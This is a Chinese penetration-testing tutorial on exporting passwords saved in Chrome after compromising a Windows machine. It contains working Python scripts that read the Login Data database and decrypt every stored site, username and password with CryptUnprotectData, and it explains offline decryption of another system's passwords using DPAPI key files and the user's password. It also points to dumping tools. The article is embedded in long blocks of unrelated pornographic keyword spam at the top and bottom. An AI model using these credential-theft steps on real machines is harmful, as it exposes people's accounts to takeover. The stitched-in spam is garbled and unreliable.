精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

滲透技巧——導出Chrome瀏覽器中保存的密碼

系統 Linux
在后滲透階段,獲得權限后需要搜集目標系統的信息。信息越全面,越有助于進一步的滲透。對于Windows系統,用戶瀏覽器往往包含有價值的信息。

[[218784]]

0x00 前言

在后滲透階段,獲得權限后需要搜集目標系統的信息。信息越全面,越有助于進一步的滲透。對于Windows系統,用戶瀏覽器往往包含有價值的信息。

在之前的文章《本地密碼查看工具LaZagne中的自定義腳本開發》曾介紹過利用LaZagne導出多個瀏覽器密碼的方法。

本文將要針對Chrome瀏覽器,介紹具體的導出原理和利用方法,解決一個實際問題: 如何導出另一系統下Chrome瀏覽器中保存的密碼?

0x01 簡介

本文將要介紹以下內容:

  • Chrome瀏覽器保存密碼的方式
  • 如何導出Chrome瀏覽器中保存的密碼
  • 常用方法的限制
  • 如何導出另一系統下Chrome瀏覽器中保存的密碼

0x02 Chrome瀏覽器保存密碼的方式

正常用戶在訪問網站時,可選擇使用Chrome瀏覽器保存登錄的用戶密碼,用于下次登錄的時候Chrome自動填寫登錄密碼,如下圖

在Chrome中可以查看保存的登錄密碼(需要提供用戶口令),如下圖

Chrome中保存的密碼先被二次加密,然后被保存在SQLite數據庫文件中,位置如下:

  1. %LocalAppData%\Google\Chrome\User Data\Default\Login Data 

實際測試:

測試系統: Win7x86

Chrome版本: 63.0.3239.132

定位SQLite數據庫文件,位于C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data

使用工具讀取數據庫文件,測試工具: SQLiteStudio

下載地址:

https://sqlitestudio.pl/index.rvt

注:

SQLiteStudio開源,特點是支持查看十六進制數據(SQLiteSpy不支持查看十六進制數據)

成功讀取數據庫文件保存的信息,但password段無法顯示,如下圖

選擇Form view,查看十六進制格式,獲得二次加密后的用戶密碼,如下圖

注:

如果Chrome正在運行,無法使用SQLiteStudio打開數據庫文件Login Data,可將該文件復制后再打開

0x03 導出Chrome瀏覽器中保存的密碼

首先,編寫程序實現讀取SQLite數據庫文件,這里選擇使用python實現

開源代碼很多,所以這里只給出一個示例

  1. from os import getenv 
  2. import sqlite3 
  3. import binascii 
  4. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  5. cursor = conn.cursor() 
  6. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  7. for result in cursor.fetchall(): 
  8.     print (binascii.b2a_hex(result[2])) 

獲得二次加密的用戶密碼,如下圖

參考Chromium開源代碼,找到Chrome做二次加密的方法: 通過Windows API CryptProtectData()實現

參考加密代碼:

https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107

CryptProtectData()的說明可參考:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

獲得關鍵信息:

(1)對應解密函數為CryptUnprotectData

參考地址:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380882(v=vs.85).aspx

(2)只有與加密數據的用戶具有相同登錄憑據的用戶才能解密數據

也就是說,只能在當前用戶的憑據下解密數據

解密的開源代碼也有很多,這里給出一個示例:

  1. from os import getenv 
  2. import sqlite3 
  3. import win32crypt 
  4. import binascii 
  5. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  6. cursor = conn.cursor() 
  7. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  8. for result in cursor.fetchall(): 
  9.     password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] 
  10.     print password 

注:

調用win32crypt.CryptUnprotectData需要安裝pywin32

下載地址:

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.7.exe

執行后,還原用戶密碼,如下圖

[[218785]]

注:

如果Chrome正在運行,無法查詢數據庫文件Login Data,顯示sqlite3.OperationalError: database is locked

綜上,在實際導出的過程中,如果Chrome正在運行,需要先復制數據庫文件,再嘗試解密

0x04 如何導出另一系統下Chrome瀏覽器中保存的密碼

參照CryptProtectData()的說明,地址如下:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

  • “Usually, the only user who can decrypt the data is a user with the 
  • same logon credentials as the user who encrypted the data.In addition, 
  • the encryption and decryption must be done on the same computer. “

是否可以斷定,無法在另一系統下導出Chrome瀏覽器中保存的密碼呢?

答案是否定的

Chrome密碼還原工具chromepass提供了一個特別的功能: Reading ChromePass passwords from external drive

chromepass下載地址:

http://www.nirsoft.net/utils/chromepass.html

說明如下:

  • “you can also read the passwords stored by Chrome Web browser from an 
  • external profile in your current operating system or from another 
  • external drive”

也就是說,使用chromepass能夠導出當前系統下另一用戶的Chrome密碼

操作界面如下圖

既然如此,如果獲得了另一系統下的相關配置文件,能否導出Chrome瀏覽器中保存的密碼呢?

當然可以

解密需要獲得三部分內容:

  1. 加密密鑰,位于%appdata%\Microsoft\Protect下對應sid文件夾下的文件 
  2. 數據庫文件Login Data 
  3. 用戶明文的密碼,用于解密加密密鑰 

由于chromepass程序的設計問題,以上文件需要組成特定格式,子目錄格式如下:

  1. \AppData\Local\Google\Chrome\User Data\Default\Login Data 
  2. \AppData\Roaming\Microsoft\Protect{sid}}\下保存key文件 

注:

{sid}必須同原系統的對應

eg.

  1. \AppData\Local\Google\Chrome\User Data\Default\Login Data 
  2. \AppData\Roaming\Microsoft\Protect\S-1-5-21-3453529135-4164765056-1075703908-1001\329c4147-0011-4ad6-829d-e32dcbd1bbd7 

如下圖

使用chromepass選擇該目錄,填入用戶明文密碼,如下圖

成功解密,如下圖

0x05 開源工具

解密當前系統下Chrome瀏覽器中保存的密碼,可供參考的工具:

1.命令行工具Chrome Password Dump,下載地址:

http://securityxploded.com/chrome-password-dump.php

2.powershell實現的工具:

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ChromeDump.ps1

3.python實現代碼,可供參考的開源代碼:

  1. from os import getenv 
  2. import sqlite3 
  3. import win32crypt 
  4. import binascii 
  5. conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data"
  6. cursor = conn.cursor() 
  7. cursor.execute('SELECT action_url, username_value, password_value FROM logins'
  8. for result in cursor.fetchall(): 
  9.     password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] 
  10.     if password
  11.         print 'Site: ' + result[0] 
  12.         print 'Username: ' + result[1] 
  13.         print 'Password: ' + password 
  14.     else
  15.         print "no password found" 

0x06 小結

本文介紹了導出Chrome瀏覽器密碼的原理和利用方法,成功解決一個實際問題: 通過加密密鑰文件和用戶明文密碼,能夠導出另一系統下Chrome瀏覽器中保存的密碼

如果只獲得了用戶密碼hash,能否導出呢?

 

責任編輯:武曉燕 來源: 博客園
相關推薦

2012-12-06 14:34:16

2017-02-08 14:30:08

Chrome密碼瀏覽器

2019-02-15 15:15:59

ChromeJavascriptHtml

2016-03-10 09:56:41

2017-12-04 09:39:41

瀏覽器Chrome小技巧

2025-02-13 10:28:17

數據泄露Chrome谷歌

2009-11-26 10:55:41

2010-01-28 10:13:43

2011-08-02 09:35:03

Chrome瀏覽器重定向

2015-01-21 15:45:50

斯巴達瀏覽器

2011-11-11 10:35:04

2023-08-11 07:36:10

2010-01-20 10:37:48

Chrome瀏覽器

2009-12-06 09:38:02

Chrome瀏覽器Avast

2009-03-07 09:57:41

Realplayer捆綁Chrome

2009-12-03 10:56:34

谷歌Chrome瀏覽器

2010-01-10 17:50:17

2009-09-22 09:17:46

谷歌Chrome瀏覽器

2012-08-08 09:18:47

Chrome瀏覽器

2009-07-17 09:16:20

Google Chro瀏覽器操作系統
點贊
收藏

51CTO技術棧公眾號

黑人巨大亚洲一区二区久| 国产91麻豆视频| 波多野结衣一区| 在线91免费看| 东北少妇不带套对白| 日韩精品123| 久久99久久99精品免视看婷婷 | 好吊操视频这里只有精品| 大香伊人久久| 国产精品国产自产拍高清av| 国产精品久久7| 九九热最新视频| 午夜电影亚洲| 国产亚洲xxx| 无人码人妻一区二区三区免费| 亚洲国产福利| 亚洲免费视频中文字幕| 日本一区高清不卡| 二区三区在线视频| 久久av资源站| 热久久这里只有精品| 欧美日韩精品亚洲精品| 成人精品电影| 日韩第一页在线| 爽爽爽在线观看| 99re66热这里只有精品4| 亚洲综合自拍偷拍| 成年人黄色在线观看| 欧美18xxxxx| av午夜一区麻豆| 粉嫩av一区二区三区免费观看 | 亚洲丝袜一区| 国产精品免费久久| 久久久一本精品99久久精品| 亚洲精品一区二区三区不卡| 久久99精品视频| 国产精品国产福利国产秒拍 | 欧美日韩你懂的| 国产福利视频在线播放| 韩国成人二区| 亚洲国产成人精品视频| www.国产二区| 亚洲羞羞网站| 一区二区三区小说| 欧美美女黄色网| 成人午夜在线影视| 最新国产の精品合集bt伙计| 亚洲精品成人自拍| 成年人视频网站在线| 国产午夜精品一区二区三区视频 | 欧美日韩亚洲激情| 国产69精品久久久久999小说| 亚洲电影视频在线| 伊人夜夜躁av伊人久久| 热久久最新地址| 在线看三级电影| 夜夜揉揉日日人人青青一国产精品| 致1999电视剧免费观看策驰影院| 日本免费中文字幕在线| 久久久国产一区二区三区四区小说| 久草热久草热线频97精品| 手机av在线免费观看| 99九九99九九九视频精品| 国产一区二区不卡视频| 日本大片在线观看| 国产无人区一区二区三区| 亚洲精品白虎| 国产原创在线观看| 亚洲最色的网站| 北条麻妃在线视频观看| 91精品韩国| 欧美综合在线视频| 亚洲天堂伊人网| 国产美女撒尿一区二区| 日韩黄色在线免费观看| 99久久精品免费视频| 欧洲美女日日| 欧美另类69精品久久久久9999| 亚洲熟女www一区二区三区| 黄色欧美日韩| 国产精品v片在线观看不卡| 日韩久久久久久久久久| 国产一区二区三区四| 国产精品露出视频| 激情福利在线| 亚洲欧美日韩久久| 奇米精品一区二区三区| 99久久婷婷国产综合精品首页| 欧美军同video69gay| 中文字幕在线观看视频www| 国产精品15p| 在线观看国产精品日韩av| 成人自拍小视频| 亚洲欧美久久久| 91精品中文在线| 亚洲欧美日韩精品永久在线| 国产精品素人视频| 欧美国产综合在线| 美女色狠狠久久| 精品乱人伦小说| 手机看片日韩av| 欧美先锋影音| 国产欧美日韩精品在线观看| www香蕉视频| 久久久精品国产免大香伊| 国产免费xxx| 日韩精品99| 欧美r级在线观看| 日本黄色激情视频| 91久久久久| 2014国产精品| a天堂中文在线| 精品久久久久久亚洲精品| 中文字幕在线视频一区二区三区| 妖精一区二区三区精品视频| 久久这里有精品视频| 中文字幕精品无码一区二区| 国产成人av一区二区| 亚洲精品人成| 亚洲一区站长工具| 精品88久久久久88久久久| 国产wwwwxxxx| 日韩高清不卡一区二区三区| 韩日午夜在线资源一区二区| 最近中文字幕免费mv2018在线| 欧美在线观看一二区| 国产肉体xxxx裸体784大胆| 欧美日韩国产精品一区二区亚洲| 国产精品一区二区三区久久| 每日更新在线观看av| 精品福利在线看| 亚洲美女高潮久久久| 亚洲精品99| 91精品国产自产在线| 免费福利在线观看| 欧美性猛xxx| 影音先锋人妻啪啪av资源网站| 欧美在线三区| 91精品久久久久久久久久久久久久| 久青青在线观看视频国产| 亚洲午夜久久久久| 特黄特色免费视频| 在线电影一区二区| 99国产超薄肉色丝袜交足的后果| 麻豆电影在线播放| 欧美三级韩国三级日本一级| 欧美老女人性生活视频| 日韩专区一卡二卡| 性欧美精品一区二区三区在线播放| 久久sese| 一区二区三区精品99久久| 国产又粗又猛又黄视频| 国产偷v国产偷v亚洲高清| 久草在在线视频| 清纯唯美日韩| 成人看片人aa| 影院在线观看全集免费观看| 欧美成人一区二区三区在线观看| 欧美成人免费看| 成人深夜在线观看| 欧美日韩在线视频一区二区三区| 日本欧美高清| 国产精品国语对白| 日本免费视频在线观看| 欧美成人激情免费网| 国产精品23p| 久久精品亚洲麻豆av一区二区 | 国产在线播放一区| www.激情网| 欧美一性一交| 国产精品久久999| 成人av免费| 精品国产百合女同互慰| 在线观看日本网站| 国产精品国产三级国产有无不卡 | 欧美激情国内偷拍| 视频二区在线| 欧美视频专区一二在线观看| 国产在线免费av| 福利一区福利二区| 超碰网在线观看| 99久久综合| 国产乱码精品一区二区三区中文 | 最近高清中文在线字幕在线观看| 在线成人av影院| 日韩精品人妻中文字幕| 国产三级精品三级在线专区| 51自拍视频在线观看| 亚洲美女网站| 亚洲综合五月天| 91精品入口| 国产精品久久国产精品99gif| 免费在线观看黄色| 亚洲精品www久久久| 国产91av在线播放| 一个色综合网站| 18啪啪污污免费网站| 成人午夜免费视频| 91香蕉视频导航| 精品电影一区| 国产91av视频在线观看| 五月天亚洲一区| 91久久久在线| 国产精品久久久久av电视剧| 久久91亚洲人成电影网站| 国产香蕉在线| 亚洲国产精品久久久久秋霞蜜臀 | 国产精品亚洲综合在线观看 | 免费黄色网址在线| 亚洲黄色av一区| 久久久久久久毛片| caoporn国产一区二区| 亚洲第一区第二区第三区| 久久男女视频| 黄页网站在线观看视频| 91精品国产麻豆国产在线观看| 欧美下载看逼逼| 91精品国产自产在线丝袜啪| 成人中文字幕+乱码+中文字幕| 午夜不卡影院| 久久久视频在线| 超碰porn在线| www.欧美精品| 国产福利在线| 亚洲男子天堂网| 天天综合在线视频| 欧美第一区第二区| 国产深喉视频一区二区| 欧美日韩亚州综合| 69xxxx国产| 色婷婷久久久亚洲一区二区三区 | 亚洲乱亚洲高清| 97免费视频观看| 欧美一区激情| 久久久久久久久网| 欧美一区综合| 成人免费看片视频在线观看| 午夜激情久久| 椎名由奈jux491在线播放| 日韩国产一区| 一区二区不卡在线| 久久综合国产| 中文视频一区视频二区视频三区| 日韩欧美一区免费| 亚洲精品高清视频| 午夜久久免费观看| 中国老女人av| 中文字幕一区二区三区久久网站| 国产又爽又黄ai换脸| 婷婷综合久久| 欧美美女黄色网| 欧美午夜在线| 国产视频九色蝌蚪| 99精品国产在热久久婷婷| av在线播放亚洲| 亚洲深夜av| 无码人妻h动漫| 日本中文一区二区三区| 国产一级做a爰片久久| 毛片av一区二区| 亚洲精品mv在线观看| 国产成人在线观看| 玖玖爱在线精品视频| 久久精品一区二区| 992在线观看| 亚洲蜜臀av乱码久久精品| 国产亚洲第一页| 精品久久久久久久久中文字幕 | 国产成人免费在线观看视频| 亚洲人成网站色在线观看| 久久久久免费看| 一本到一区二区三区| 一级特黄aaa大片在线观看| 欧美一级日韩一级| 午夜性色福利视频| 在线电影av不卡网址| av毛片在线免费看| 欧美亚洲成人xxx| 在线一区视频观看| 999热视频在线观看| 亚洲影院天堂中文av色| 亚洲欧美日韩另类精品一区二区三区| 中文字幕一区二区三三| 久久亚洲中文字幕无码| 日本视频免费一区| 一级黄色免费视频| 国产午夜亚洲精品羞羞网站| 男人在线观看视频| 丰满岳妇乱一区二区三区| 亚洲资源在线播放| 亚洲国产美女久久久久| 午夜激情在线观看| 国内精品美女av在线播放| av成人免费| 黄色99视频| 国产精品久久天天影视| 国产美女无遮挡网站| 极品美女销魂一区二区三区免费| www.com日本| 国产精品素人视频| 精品免费囯产一区二区三区| 欧美一区午夜精品| 电影在线一区| 97激碰免费视频| 国产一区二区av在线| 日韩欧美国产二区| 亚洲国产高清一区| 国产亚洲视频一区| 久久九九国产精品| 国产在线综合网| 欧美高清精品3d| 精华区一区二区三区| 97高清免费视频| 网站一区二区| 亚洲天堂av免费在线观看| 老司机精品视频网站| 亚洲一区二区在线免费| 亚洲精品国产精品乱码不99| 亚洲视频一区在线播放| 亚洲免费福利视频| av中文字幕在线观看第一页 | 欧洲精品一区| 亚洲中文字幕无码一区二区三区| 蜜桃久久av一区| 妺妺窝人体色WWW精品| 欧美午夜精品久久久久久人妖| 午夜精品久久久久久久第一页按摩 | 午夜在线成人av| 亚洲第一大网站| 久久国产精品久久久久久| 九九九精品视频| 五月天国产一区| 日韩成人伦理电影在线观看| 性色av蜜臀av色欲av| 调教+趴+乳夹+国产+精品| 亚洲国产999| 久久久久久亚洲精品不卡| 亚洲国产高清在线观看| 糖心vlog在线免费观看| 激情综合网最新| 三级全黄做爰视频| 91精品在线免费观看| 超碰在线观看免费版| 亚洲淫片在线视频| 亚洲色图欧美| 日本少妇一级片| 夜夜揉揉日日人人青青一国产精品| 性一交一乱一色一视频麻豆| 欧美理论电影在线观看| 51精品国产| 九九爱精品视频| 久久久久99精品一区| 午夜久久久久久久久久影院| 在线观看不卡av| 国产午夜久久av| 欧美黑人在线观看| 99精品久久只有精品| 毛片基地在线观看| 夜夜嗨av色综合久久久综合网| 91九色综合| 欧美日韩亚洲国产成人| 国产精品一区二区黑丝| 国产精彩视频在线| 亚洲精品在线视频| 成人亚洲视频| 日韩视频 中文字幕| 精品免费av| 色老头一区二区三区在线观看| 日韩免费av片| 日韩精品免费看| 2019年精品视频自拍| 国产精品亚洲天堂| 成人精品视频一区二区三区尤物| 国产精品theporn动漫| 亚洲乱码一区av黑人高潮| 国产精品美女午夜爽爽| 国产在线无码精品| 97久久精品人人做人人爽50路| 人人妻人人爽人人澡人人精品| 久久久国产精品x99av | 亚洲精品卡一卡二| 精品国产91久久久久久久妲己| 亚洲精品成人图区| 亚洲日本精品| 成人app下载| 岳乳丰满一区二区三区| 欧美黄色片免费观看| 精品一区在线| 少妇高潮一69aⅹ| 色综合天天综合网国产成人综合天| 麻豆最新免费在线视频| 99c视频在线| 日日摸夜夜添夜夜添国产精品 | 老司机福利av| 91精品国产综合久久久久久久久久| 日本动漫理论片在线观看网站| 日本视频一区二区在线观看| 国产成人免费在线视频| 亚洲国产成人精品女人久久| 欧美精品免费播放|